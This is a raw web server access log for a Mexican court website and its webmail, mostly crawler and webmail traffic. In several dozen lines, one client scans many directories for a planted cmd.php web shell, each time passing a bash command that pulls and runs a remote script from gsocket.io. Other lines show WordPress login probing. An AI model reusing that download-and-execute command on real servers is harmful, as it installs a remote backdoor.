187.195.110.68 - - [05/Feb/2025:12:43:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:43:37 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:43 -0600] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:43:45 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:43:45 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:43:46 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:53 -0600] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:44:03 -0600] "GET /81470296983.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:44:08 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:44:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:44:35 -0600] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:44:37 -0600] "GET /00317459171.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
177.240.146.101 - - [05/Feb/2025:12:44:42 -0600] "GET /favicon.ico HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:44:43 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:44:46 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:44:48 -0600] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:45:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:45:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12367 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:45:02 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:45:11 -0600] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.200 - - [05/Feb/2025:12:45:13 -0600] "GET /18753176729.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:45:22 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:45:29 -0600] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:45:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:45:42 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:45:47 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:45:48 -0600] "GET /view-box_2021/contenidos.php?action=ver&ta=na39fv8&year=2022&tempo=14&nt=2 HTTP/1.1" 301 328 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.198 - - [05/Feb/2025:12:45:56 -0600] "GET /3090034531.shtml HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
134.209.102.237 - - [05/Feb/2025:12:45:59 -0600] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:46:24 -0600] "GET /sisofi_2018/uploads/14-12-2021/JEL-0908-2021-I.pdf HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:46:32 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:46:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.244.66.234 - - [05/Feb/2025:12:46:40 -0600] "GET /robots.txt HTTP/1.1" 301 248 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:12:46:41 -0600] "GET /robots.txt HTTP/1.1" 301 248 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
134.209.102.237 - - [05/Feb/2025:12:46:48 -0600] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:46:48 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:46:56 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:47:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:47:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12363 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
69.171.234.5 - - [05/Feb/2025:12:47:02 -0600] "GET /Noticias&idnoti=248 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.113 - - [05/Feb/2025:12:47:02 -0600] "GET /Noticias&idnoti=248 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.22 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=241 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.16 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=241 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.1 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=184 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.23 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=184 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.15 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=169 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.10 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=165 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.16 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=165 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.12 - - [05/Feb/2025:12:47:03 -0600] "GET /Noticias&idnoti=169 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.13 - - [05/Feb/2025:12:47:04 -0600] "GET /Noticias&idnoti=231 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
134.209.102.237 - - [05/Feb/2025:12:47:04 -0600] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
69.171.234.1 - - [05/Feb/2025:12:47:04 -0600] "GET /Noticias&idnoti=231 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.2 - - [05/Feb/2025:12:47:04 -0600] "GET /Noticias&idnoti=221 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.234.24 - - [05/Feb/2025:12:47:04 -0600] "GET /Noticias&idnoti=221 HTTP/1.1" 301 261 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.249.77.199 - - [05/Feb/2025:12:47:04 -0600] "GET /087631290722.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:47:10 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:47:16 -0600] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:47:25 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:47:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:47:36 -0600] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:47:49 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:47:55 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:47:58 -0600] "GET /view-box_2021/contenidos.php?action=ver&ta=na39fv8&year=2020&tempo=16&nt=4 HTTP/1.1" 301 328 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:48:12 -0600] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:17 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:22 -0600] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:24 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:48:26 -0600] "GET /40879981821.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:48:31 -0600] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:48:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:48:44 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:46 -0600] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:48:50 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:48:50 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:48:54 -0600] "GET /sisofi_2018/uploads/14-04-2021/JA-1846-2019-II_1.pdf HTTP/1.1" 301 290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:48:58 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:49:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12366 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:49:10 -0600] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
40.77.167.75 - - [05/Feb/2025:12:49:12 -0600] "GET /salvador-jara-esta-limpio-porque-no-firmo-asm/view-box_2021/view-box_2021/Ubicacion HTTP/1.1" 301 321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:49:19 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:49:22 -0600] "GET /102881647492.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:49:22 -0600] "GET /sisofi_2018/uploads/11-09-2019/JA-0493-2018-II.pdf HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:49:24 -0600] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
52.167.144.184 - - [05/Feb/2025:12:49:33 -0600] "GET /cigarette34/muoo0-40799/ HTTP/1.1" 301 262 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:49:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:49:38 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:49:48 -0600] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:49:50 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:49:51 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:49:57 -0600] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
216.244.66.234 - - [05/Feb/2025:12:50:07 -0600] "GET /tribunal-de-justicia/calendario-oficial-de-labores/view-box_2021/view-box_2021/view-box_2021/Calendario-Oficial HTTP/1.1" 301 349 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
134.209.102.237 - - [05/Feb/2025:12:50:12 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:50:17 -0600] "GET /827931395781.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:50:22 -0600] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:50:28 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:50:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
69.197.182.50 - - [05/Feb/2025:12:50:37 -0600] "GET /wp-includes/install.php HTTP/1.1" 301 261 "https://tjamich.gob.mx/wp-includes/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.182.50 - - [05/Feb/2025:12:50:37 -0600] "GET / HTTP/1.1" 301 238 "https://tjamich.gob.mx" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
134.209.102.237 - - [05/Feb/2025:12:50:44 -0600] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.199 - - [05/Feb/2025:12:50:45 -0600] "GET /70943388772.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:50:45 -0600] "GET /sisofi_2018/uploads/14-12-2021/JA-0187-2021-I.pdf HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:50:52 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:51:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:51:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12365 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
204.10.194.36 - - [05/Feb/2025:12:51:01 -0600] "POST /wp-login.php HTTP/1.1" 301 247 "https://tjamich.gob.mx/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:51:04 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:51:09 -0600] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
